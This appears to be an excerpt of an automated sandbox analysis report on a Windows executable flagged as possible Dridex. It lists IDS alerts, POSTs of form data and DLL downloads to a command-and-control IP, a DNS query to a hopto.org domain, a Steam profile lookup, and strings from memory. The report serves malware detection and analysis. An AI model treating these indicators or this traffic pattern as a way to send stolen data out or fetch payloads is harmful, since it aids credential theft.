                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49886 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49922 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49941 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49963 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49930 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49987 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49976 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49950 -> 95.217.220.103:443
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCFIDAKJDHIECBFCBKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 7977Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBAKJDBKJJKFIDBGHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEGCGDGHCBFHIDHDAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 99261Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFBGDGHIIJJKEBKJDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_00406963
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                          Source: global trafficDNS traffic detected: DNS query: cowod.hopto.org
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCFIDAKJDHIECBFCBKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555218963.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.JDHJKECAKEHI
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.CAKEHI
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/b
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/~
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.orgEHI
                          Source: UMrFwHyjUi.exe, 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hoptoECAKEHI
                          Source: UMrFwHyjUi.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                          Source: UMrFwHyjUi.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                          Source: UMrFwHyjUi.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                          Source: UMrFwHyjUi.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                          Source: UMrFwHyjUi.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555218963.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
